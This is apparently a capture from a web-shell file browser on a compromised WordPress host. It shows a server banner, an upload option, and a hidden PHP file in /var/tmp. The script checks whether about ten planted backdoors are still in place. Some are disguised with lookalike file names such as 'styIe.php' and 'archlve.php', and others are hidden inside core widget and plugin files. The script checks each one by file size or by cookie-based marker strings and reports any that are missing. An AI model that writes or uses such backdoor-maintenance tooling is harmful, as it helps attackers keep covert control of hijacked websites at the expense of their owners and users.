HEX
Server: Apache
System: Linux iad1-shared-b8-22 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_7uh9vd (6523960)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: //var/tmp/.created
<?php   $r = '/home/stancato/stancato'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@377896@@$_COOKIE[9",
"/wp-content/themes/custom-file-5-1748027075/4O4.php"=>"bd@@264450@@727",
"/wp-content/themes/comment_section_1748020200/archlve.php"=>"bd@@256786@@727",
"/wp-includes/widgets/class-wp-widget-text.php"=>"bd@@397372@@settings",
"/cbbaad.php"=>"bd@@16737@@105",
"/wp-content/themes/custom_file_3_1748022647/styIe.php"=>"bd@@258926@@727",
"/wp-content/themes/astra/inc/customizer/custom-controls/index.php"=>"bd@@207516@@_COOKIE[3]",
"/886d35.php"=>"bd@@86965@@105",
"/wp-includes/blocks/query-title.php"=>"bd@@207062@@Sec-Websocket-Accept",
"/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/mvc/package.module.mvc.php"=>"bd@@397535@@98"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');